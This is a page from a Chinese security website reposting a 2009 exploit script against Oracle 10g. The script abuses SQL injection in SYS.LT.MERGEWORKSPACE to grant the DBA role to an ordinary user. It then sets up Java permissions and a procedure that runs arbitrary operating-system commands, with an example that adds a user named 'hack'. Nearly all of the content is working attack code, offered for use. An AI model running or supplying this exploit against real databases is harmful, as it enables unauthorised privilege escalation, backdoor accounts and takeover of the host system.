首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit 来源：http://www.dsecrg.ru 作者：Polyakov 发布时间：2009-01-07   /*********************************************************/ /*Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit**/ /****grant DBA and create new  OS user (java)*************/ /*********************************************************/ /***********exploit grant DBA to scott********************/ /***********and execute OS command "net user"*************/ /***********using java procedures ************************/ /*********************************************************/ /***********tested on oracle 10.1.0.5.0*******************/ /*********************************************************/ /*********************************************************/ /* Date of Public EXPLOIT: January 6, 2009               */ /* Written by:             Alexandr "Sh2kerr" Polyakov   */ /* email:                  Alexandr.Polyakov@dsec.ru     */ /* site:                   http://www.dsecrg.ru          */ /*                         http://www.dsec.ru            */ /*********************************************************/ /*Original Advisory:                                     */ /*Esteban Martinez Fayo [Team SHATTER ]                  */ /*Date of Public Advisory: November 11, 2008             */ /*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ /*********************************************************/ select * from user_role_privs; CREATE OR REPLACE FUNCTION Y return varchar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; COMMIT; RETURN 'Y'; END; / exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y'); exec SYS.LT.MERGEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y'); /* Creating simple java procedure that executes OS  */ exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute'); exec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); exec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS import java.lang.*; import java.io.*; public class JAVACMD { public static void execCommand (String command) throws IOException {      Runtime.getRuntime().exec(command); } }; / CREATE OR REPLACE PROCEDURE JAVAEXEC (p_command  IN  VARCHAR2) AS LANGUAGE JAVA NAME 'JAVACMD.execCommand (java.lang.String)'; / /* here we can paste any OS command for example create new user */ exec javaexec(‘net user hack 12345 /add’); select * from user_role_privs;   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Oracle 10g SYS.LT.REMOVEWORKSP ·Oracle 10g SYS.LT.COMPRESSWORK ·Safari (Arguments) Array Integ ·RiotPix <= 0.61 (forumid) Blin ·PHPAuctionSystem (XSS/SQL) Mul ·Debian GNU/Linux XTERM (DECRQS ·VUPlayer 2.49 (.wax File) Loca ·Goople <= 1.8.2 (frontpage.php ·Joomla com_phocadocumentation ·Rosoft Media Player 4.2.1 Loca ·oomla com_na_newsdescription ( ·SeaMonkey <= 1.1.14 (marquee)   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved